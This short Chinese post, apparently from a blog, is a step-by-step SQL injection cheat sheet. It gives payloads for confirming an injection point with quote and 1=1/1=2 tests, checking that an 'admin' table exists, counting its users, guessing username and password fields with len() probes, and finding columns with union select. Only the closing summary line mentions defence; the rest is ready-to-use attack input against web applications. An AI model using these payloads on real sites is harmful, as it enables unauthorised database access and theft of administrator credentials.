1、判断注入存在:
' 存在错误
and 1=1 返回正确
and 1=2 返回错误
2、判断表:
and 0<>(select count(*) from admin)
3、判断用户数目
and n<(select count(*) from admin)
4、猜解字段名称
在len( ) 括号里面加上我们想到的字段名称
and 1=(select count(*) from admin where len(用户字段名称name)>0)
and 1=(select count(*) from admin where len(_blank>密码字段名称password)>0)
5、 判断id值
?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin
?id=-1 union select 1,2,3,4,5,6,7,8, *,9,10,11,12,13 from admin (union,access也好用)
本文介绍了一种通过SQL注入攻击来探测数据库信息的方法,包括判断注入存在的条件、确定表名及字段名、猜解用户数量等步骤。对于信息安全及数据库防护具有重要的参考价值。
766

被折叠的 条评论
为什么被折叠?



